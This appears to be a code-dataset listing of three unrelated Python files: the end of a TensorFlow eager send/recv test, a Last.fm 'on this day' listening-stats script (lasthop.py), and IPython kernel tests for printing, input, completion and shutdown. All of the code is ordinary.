def _recv(self, dtype, tensor_name, from_device):
device_name = context.context().device_name
if not device_name:
device_name = self.cpu_device
return execute(
b'_Recv', num_outputs=1, inputs=[],
attrs=('tensor_type', dtype.as_datatype_enum,
'tensor_name', tensor_name,
'send_device', from_device,
'send_device_incarnation', 0,
'recv_device', device_name,
'client_terminated', False))[0]
def setUp(self):
super(SendRecvTest, self).setUp()
configure_virtual_cpus()
def testBasic(self):
t0 = constant_op.constant(1.0)
t1 = constant_op.constant(2.0)
self._send(t0, 't0', self.cpu_device)
self._send(t1, 't1', self.cpu_device)
self.assertAllEqual(
self._recv(dtypes.float32, 't0', self.cpu_device),
1.0)
self.assertAllEqual(
self._recv(dtypes.float32, 't1', self.cpu_device),
2.0)
@test_util.run_gpu_only
def testLocalCrossDevice(self):
gpu_device_name = '/job:localhost/replica:0/task:0/device:GPU:0'
with ops.device('GPU:0'):
t0 = constant_op.constant(1.0)
self._send(t0, 't0', self.cpu_device)
with ops.device('cpu:0'):
self.assertAllEqual(
self._recv(dtypes.float32, 't0', gpu_device_name),
1.0)
self._send(constant_op.constant(2.0), 't1', gpu_device_name)
with ops.device('GPU:0'):
self.assertAllEqual(
self._recv(dtypes.float32, 't1', self.cpu_device),
2.0)
class EagerTensorCacheTest(test_util.TensorFlowTestCase):
def setUp(self):
super(EagerTensorCacheTest, self).setUp()
configure_virtual_cpus()
def testCacheSkipsTensorsTooLarge(self):
cache = context._EagerTensorCache(max_items=100, max_tensor_size=3)
cache.put('1', array_ops.zeros((2, 2)))
self.assertIsNone(cache.get('1'))
cache.put('2', array_ops.zeros((2)))
self.assertIsNotNone(cache.get('2'))
if __name__ == '__main__':
test.main()
|
lasthop.py
|
import os
import csv
import json
import multiprocessing
import raw_file_writer
import lastfm_user_data as lud
from datetime import datetime, timedelta
from shared.config import Config
# STATS_START_DATE = datetime.today() - timedelta(days=1)
STATS_START_DATE = datetime.today()
def go():
Lasthop.run()
class FormattedFileWriter:
def __init__(self, lastfm_username, lastfm_join_date):
self.username = lastfm_username
self.join_date = lastfm_join_date
self.api_key = Config.API_KEY
self.timezone_diff = self.get_timezone_diff()
self.raw_data_path = f"{Config.RAW_DATA_PATH}/users/{self.username}"
self.file_path = os.path.dirname(
os.path.realpath(__file__)
) + "/users/{username}".format(username=self.username)
if not os.path.exists(self.file_path):
os.makedirs(self.file_path)
self.raw_file_writer = raw_file_writer.RawFileWriter(
start_date=self.join_date,
end_date=STATS_START_DATE,
interval=raw_file_writer.Interval.YEAR.value,
include_lyrics=False,
)
def format_data_for_all_days(self):
days = self.get_list_of_dates()
jobs = []
for day in days:
job = multiprocessing.Process(target=self.write_files_for_day, args=(day,))
jobs.append(job)
job.start()
for job in jobs:
job.join()
def write_files_for_day(self, day):
self.raw_file_writer.write_raw_file_for_day(day)
self.write_formatted_file_for_day(day)
def get_list_of_dates(self):
date_to_process = STATS_START_DATE
days = []
while date_to_process >= self.join_date:
days.append(date_to_process)
date_to_process = date_to_process.replace(year=date_to_process.year - 1)
return days
def write_formatted_file_for_day(self, date):
formatted_file_name = self.get_formatted_filename_for_date(date)
if not self.file_needs_to_be_written(formatted_file_name, date):
return
raw_file_name = self.get_raw_filename_for_date(date)
with open(raw_file_name, "r+") as file:
raw_data = file.read()
json_data = json.loads(raw_data)
with open(formatted_file_name, "w+") as file:
if not json_data:
file.write("0")
return
for line in json_data:
if isinstance(line, dict):
artist = line.get("artist", {}).get("#text").replace("|", "")
title = line.get("name").replace(",", "")
play_date = line.get("date", {}).get(
"#text",
(datetime.now() - timedelta(hours=self.timezone_diff)).strftime(
"%d %b %Y, %H:%M"
),
)
play_date_datetime = datetime.strptime(
play_date, "%d %b %Y, %H:%M"
) + timedelta(hours=self.timezone_diff)
play_date_formatted = play_date_datetime.strftime(
"%Y/%m/%d %H:%M:%S"
)
line_to_write = f"{artist}|{title}|{play_date_formatted}"
file.write(line_to_write + "\n")
def get_raw_filename_for_date(self, date):
date_string = datetime.strftime(date, "%Y-%m-%d")
return f"{self.raw_data_path}/{date_string}raw.txt"
def get_formatted_filename_for_date(self, date):
date_string = datetime.strftime(date, "%Y-%m-%d")
return f"{self.file_path}/{date_string}.csv"
def get_filename_for_date(self, date):
date_string = datetime.strftime(date, "%Y-%m-%d")
return f"{self.file_path}/{date_string}.csv"
@staticmethod
def get_timezone_diff():
"""
Get difference in hours from UTC timezone. Daylight savings makes this variable.
:return: Timezone diff in hours
"""
return datetime.now().hour - datetime.utcnow().hour
@staticmethod
def file_needs_to_be_written(file_name, date):
"""
Check that the file exists and if it does, only re-write it if it's today's file.
:param file_name:
:return:
"""
file_exists = os.path.exists(file_name) and os.stat(file_name).st_size > 0
file_is_today = date.date() == datetime.today().date()
return not (file_exists and not file_is_today)
class StatsCompiler:
def __init__(self, lastfm_username, lastfm_join_date):
self.username = lastfm_username
self.join_date = lastfm_join_date
self.file_path = os.path.dirname(
os.path.realpath(__file__)
) + "/users/{username}".format(username=self.username)
if not os.path.exists(self.file_path):
print(f"No data found for {self.username}")
self.yearly_data_dict = self.compile_stats()
def compile_stats(self):
days = self.get_list_of_dates()
yearly_data_dict = {}
for day in days:
yearly_data_dict[day] = self.read_file_for_day(day)
return yearly_data_dict
def all_artists(self):
days = self.get_list_of_dates()
result = []
for day in days:
result.append(self.all_artists_for_date(day))
return result
def all_artists_for_date(self, date):
artist_playcount_dict = self.get_artist_playcount_dict_for_date(date)
if artist_playcount_dict:
print(f"* - {date.year} - *")
for artist in sorted(
artist_playcount_dict,
key=artist_playcount_dict.__getitem__,
reverse=True,
):
print(
"\t{artist}: {plays}".format(
artist=artist.replace("'", "`"),
plays=artist_playcount_dict.get(artist),
)
)
def most_played_artists(self):
days = self.get_list_of_dates()
result = []
for day in days:
result.append(self.most_played_artist_for_date(day))
return result
def most_played_artist_for_date(self, date):
artist_playcount_dict = self.get_artist_playcount_dict_for_date(date)
if artist_playcount_dict:
highest_playcount = max(
artist_playcount_dict, key=artist_playcount_dict.get
)
day_list = ["Mon", "Tue", "Wed", "Thu", "Fri", "Sat", "Sun"]
count = artist_playcount_dict.get(highest_playcount)
artist = highest_playcount.split("|")[0]
return f"{date.year} ({day_list[date.weekday()]}): {artist} ({count})"
def get_artist_playcount_dict_for_date(self, date):
day_data_dict = self.yearly_data_dict.get(date)
artist_playcount_dict = {}
if day_data_dict:
for entry in day_data_dict:
artist_name = entry.split("|")[0]
if not artist_playcount_dict.get(artist_name):
artist_playcount_dict[artist_name] = 1
else:
artist_playcount_dict[artist_name] += 1
return artist_playcount_dict
def read_file_for_day(self, day):
track_time_stamp_dict = {}
with open(self.get_filename_for_date(day), "r+") as csv_file:
csv_reader = csv.reader(csv_file, delimiter="|")
for row in csv_reader:
if row[0] == "0":
break
artist = row[0]
title = row[1]
timestamp = row[2]
artist_track = f"{artist} | {title}"
if not track_time_stamp_dict.get(artist_track):
track_time_stamp_dict[artist_track] = [timestamp]
else:
timestamp_list = track_time_stamp_dict.get(artist_track)
timestamp_list.append(timestamp)
track_time_stamp_dict[artist_track] = timestamp_list
return track_time_stamp_dict
def get_list_of_dates(self):
date_to_process = STATS_START_DATE
days = []
while date_to_process >= self.join_date:
days.append(date_to_process)
date_to_process = date_to_process.replace(year=date_to_process.year - 1)
return days
def get_filename_for_date(self, date):
date_string = datetime.strftime(date, "%Y-%m-%d")
return f"{self.file_path}/{date_string}.csv"
class StatsPresenter:
def __init__(self, usermame, real_name, join_date, total_tracks):
self.username = usermame
self.real_name = real_name
self.join_date = join_date
self.total_tracks = total_tracks
self.avg_daily_tracks = int(
self.total_tracks / (STATS_START_DATE - self.join_date).days
)
self.stats_compiler = StatsCompiler(self.username, self.join_date)
def present(self):
intro = (
f"\n{self.real_name} has been on Last.fm for "
f"{(STATS_START_DATE.year - self.join_date.year)} years.\n"
f"They've played {self.total_tracks} tracks.\n"
f"That's an average of {self.avg_daily_tracks} track{'s' if self.avg_daily_tracks > 1 else ''} "
f"per day.\n"
)
print(intro)
print(
f"- - - - - - - - - - - - - {STATS_START_DATE.strftime('%B %-d')} - - - - - - - - - - - - - -\n"
)
print("- - - - - - - - - - - Most Played Artists - - - - - - - - - - - -")
for most_played in self.stats_compiler.most_played_artists():
if most_played:
print(most_played)
print("- - - - - - - - - - - - - All Artists - - - - - - - - - - - - - - -")
self.stats_compiler.all_artists()
class Lasthop:
@classmethod
def run(cls):
start_time = datetime.now()
Lasthop().lasthop()
print(f"\n(took {(datetime.now() - start_time).seconds} seconds)")
def __init__(self):
self.user_data = lud.UserData().get_lastfm_user_data()
def lasthop(self):
formatted_file_writer = FormattedFileWriter(
self.user_data["username"], self.user_data["join_date"]
)
formatted_file_writer.format_data_for_all_days()
presenter = StatsPresenter(
self.user_data["username"],
self.user_data["real_name"],
self.user_data["join_date"],
self.user_data["total_tracks"],
)
presenter.present()
if __name__ == "__main__":
Lasthop.run()
|
test_kernel.py
|
# coding: utf-8
"""test the IPython Kernel"""
# Copyright (c) IPython Development Team.
# Distributed under the terms of the Modified BSD License.
import io
import os.path
import sys
import time
import nose.tools as nt
from IPython.testing import decorators as dec, tools as tt
from ipython_genutils import py3compat
from IPython.paths import locate_profile
from ipython_genutils.tempdir import TemporaryDirectory
from .utils import (
new_kernel, kernel, TIMEOUT, assemble_output, execute,
flush_channels, wait_for_idle,
)
def _check_master(kc, expected=True, stream="stdout"):
execute(kc=kc, code="import sys")
flush_channels(kc)
msg_id, content = execute(kc=kc, code="print (sys.%s._is_master_process())" % stream)
stdout, stderr = assemble_output(kc.iopub_channel)
assert stdout.strip() == repr(expected)
def _check_status(content):
"""If status=error, show the traceback"""
if content['status'] == 'error':
assert False, ''.join(['\n'] + content['traceback'])
# printing tests
def test_simple_print():
"""simple print statement in kernel"""
with kernel() as kc:
iopub = kc.iopub_channel
msg_id, content = execute(kc=kc, code="print ('hi')")
stdout, stderr = assemble_output(iopub)
assert stdout == 'hi\n'
assert stderr == ''
_check_master(kc, expected=True)
def test_sys_path():
"""test that sys.path doesn't get messed up by default"""
with kernel() as kc:
msg_id, content = execute(kc=kc, code="import sys; print (repr(sys.path[0]))")
stdout, stderr = assemble_output(kc.iopub_channel)
assert stdout == "''\n"
def test_sys_path_profile_dir():
"""test that sys.path doesn't get messed up when `--profile-dir` is specified"""
with new_kernel(['--profile-dir', locate_profile('default')]) as kc:
msg_id, content = execute(kc=kc, code="import sys; print (repr(sys.path[0]))")
stdout, stderr = assemble_output(kc.iopub_channel)
assert stdout == "''\n"
@dec.skipif(sys.platform == 'win32', "subprocess prints fail on Windows")
def test_subprocess_print():
"""printing from forked mp.Process"""
with new_kernel() as kc:
iopub = kc.iopub_channel
_check_master(kc, expected=True)
flush_channels(kc)
np = 5
code = '\n'.join([
"from __future__ import print_function",
"import time",
"import multiprocessing as mp",
"pool = [mp.Process(target=print, args=('hello', i,)) for i in range(%i)]" % np,
"for p in pool: p.start()",
"for p in pool: p.join()",
"time.sleep(0.5),"
])
msg_id, content = execute(kc=kc, code=code)
stdout, stderr = assemble_output(iopub)
nt.assert_equal(stdout.count("hello"), np, stdout)
for n in range(np):
nt.assert_equal(stdout.count(str(n)), 1, stdout)
assert stderr == ''
_check_master(kc, expected=True)
_check_master(kc, expected=True, stream="stderr")
def test_subprocess_noprint():
"""mp.Process without print doesn't trigger iostream mp_mode"""
with kernel() as kc:
iopub = kc.iopub_channel
np = 5
code = '\n'.join([
"import multiprocessing as mp",
"pool = [mp.Process(target=range, args=(i,)) for i in range(%i)]" % np,
"for p in pool: p.start()",
"for p in pool: p.join()"
])
msg_id, content = execute(kc=kc, code=code)
stdout, stderr = assemble_output(iopub)
assert stdout == ''
assert stderr == ''
_check_master(kc, expected=True)
_check_master(kc, expected=True, stream="stderr")
@dec.skipif(sys.platform == 'win32', "subprocess prints fail on Windows")
def test_subprocess_error():
"""error in mp.Process doesn't crash"""
with new_kernel() as kc:
iopub = kc.iopub_channel
code = '\n'.join([
"import multiprocessing as mp",
"p = mp.Process(target=int, args=('hi',))",
"p.start()",
"p.join()",
])
msg_id, content = execute(kc=kc, code=code)
stdout, stderr = assemble_output(iopub)
assert stdout == ''
assert "ValueError" in stderr
_check_master(kc, expected=True)
_check_master(kc, expected=True, stream="stderr")
# raw_input tests
def test_raw_input():
"""test [raw_]input"""
with kernel() as kc:
iopub = kc.iopub_channel
input_f = "input" if py3compat.PY3 else "raw_input"
theprompt = "prompt> "
code = 'print({input_f}("{theprompt}"))'.format(**locals())
msg_id = kc.execute(code, allow_stdin=True)
msg = kc.get_stdin_msg(block=True, timeout=TIMEOUT)
assert msg['header']['msg_type'] == u'input_request'
content = msg['content']
assert content['prompt'] == theprompt
text = "some text"
kc.input(text)
reply = kc.get_shell_msg(block=True, timeout=TIMEOUT)
assert reply['content']['status'] == 'ok'
stdout, stderr = assemble_output(iopub)
assert stdout == text + "\n"
@dec.skipif(py3compat.PY3)
def test_eval_input():
"""test input() on Python 2"""
with kernel() as kc:
iopub = kc.iopub_channel
input_f = "input" if py3compat.PY3 else "raw_input"
theprompt = "prompt> "
code = 'print(input("{theprompt}"))'.format(**locals())
msg_id = kc.execute(code, allow_stdin=True)
msg = kc.get_stdin_msg(block=True, timeout=TIMEOUT)
assert msg['header']['msg_type'] == u'input_request'
content = msg['content']
assert content['prompt'] == theprompt
kc.input("1+1")
reply = kc.get_shell_msg(block=True, timeout=TIMEOUT)
assert reply['content']['status'] == 'ok'
stdout, stderr = assemble_output(iopub)
assert stdout == "2\n"
def test_save_history():
# Saving history from the kernel with %hist -f was failing because of
# unicode problems on Python 2.
with kernel() as kc, TemporaryDirectory() as td:
file = os.path.join(td, 'hist.out')
execute(u'a=1', kc=kc)
wait_for_idle(kc)
execute(u'b=u"abcþ"', kc=kc)
wait_for_idle(kc)
_, reply = execute("%hist -f " + file, kc=kc)
assert reply['status'] == 'ok'
with io.open(file, encoding='utf-8') as f:
content = f.read()
assert u'a=1' in content
assert u'b=u"abcþ"' in content
@dec.skip_without('faulthandler')
def test_smoke_faulthandler():
with kernel() as kc:
# Note: faulthandler.register is not available on windows.
code = u'\n'.join([
'import sys',
'import faulthandler',
'import signal',
'faulthandler.enable()',
'if not sys.platform.startswith("win32"):',
' faulthandler.register(signal.SIGTERM)'])
_, reply = execute(code, kc=kc)
nt.assert_equal(reply['status'], 'ok', reply.get('traceback', ''))
def test_help_output():
"""ipython kernel --help-all works"""
tt.help_all_output_test('kernel')
def test_is_complete():
with kernel() as kc:
# There are more test cases for this in core - here we just check
# that the kernel exposes the interface correctly.
kc.is_complete('2+2')
reply = kc.get_shell_msg(block=True, timeout=TIMEOUT)
assert reply['content']['status'] == 'complete'
# SyntaxError
kc.is_complete('raise = 2')
reply = kc.get_shell_msg(block=True, timeout=TIMEOUT)
assert reply['content']['status'] == 'invalid'
kc.is_complete('a = [1,\n2,')
reply = kc.get_shell_msg(block=True, timeout=TIMEOUT)
assert reply['content']['status'] == 'incomplete'
assert reply['content']['indent'] == ''
# Cell magic ends on two blank lines for console UIs
kc.is_complete('%%timeit\na\n\n')
reply = kc.get_shell_msg(block=True, timeout=TIMEOUT)
assert reply['content']['status'] == 'complete'
def test_complete():
with kernel() as kc:
execute(u'a = 1', kc=kc)
wait_for_idle(kc)
cell = 'import IPython\nb = a.'
kc.complete(cell)
reply = kc.get_shell_msg(block=True, timeout=TIMEOUT)
c = reply['content']
assert c['status'] == 'ok'
assert c['cursor_start'] == cell.find('a.')
assert c['cursor_end'] == cell.find('a.') + 2
matches = c['matches']
nt.assert_greater(len(matches), 0)
for match in matches:
assert match[:2] == 'a.'
@dec.skip_without('matplotlib')
def test_matplotlib_inline_on_import():
with kernel() as kc:
cell = '\n'.join([
'import matplotlib, matplotlib.pyplot as plt',
'backend = matplotlib.get_backend()'
])
_, reply = execute(cell,
user_expressions={'backend': 'backend'},
kc=kc)
_check_status(reply)
backend_bundle = reply['user_expressions']['backend']
_check_status(backend_bundle)
assert 'backend_inline' in backend_bundle['data']['text/plain']
def test_message_order():
N = 100 # number of messages to test
with kernel() as kc:
_, reply = execute("a = 1", kc=kc)
_check_status(reply)
offset = reply['execution_count'] + 1
cell = "a += 1\na"
msg_ids = []
# submit N executions as fast as we can
for i in range(N):
msg_ids.append(kc.execute(cell))
# check message-handling order
for i, msg_id in enumerate(msg_ids, offset):
reply = kc.get_shell_msg(timeout=TIMEOUT)
_check_status(reply['content'])
assert reply['content']['execution_count'] == i
assert reply['parent_header']['msg_id'] == msg_id
def test_shutdown():
"""Kernel exits after polite shutdown_request"""
with new_kernel() as kc:
km = kc.parent
execute(u'a = 1', kc=kc)
wait_for_idle(kc)
kc.shutdown()
for i in range(100): # 10s timeout
if km.is_alive():
time.sleep(.1)
else:
break
assert not km.is_alive()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.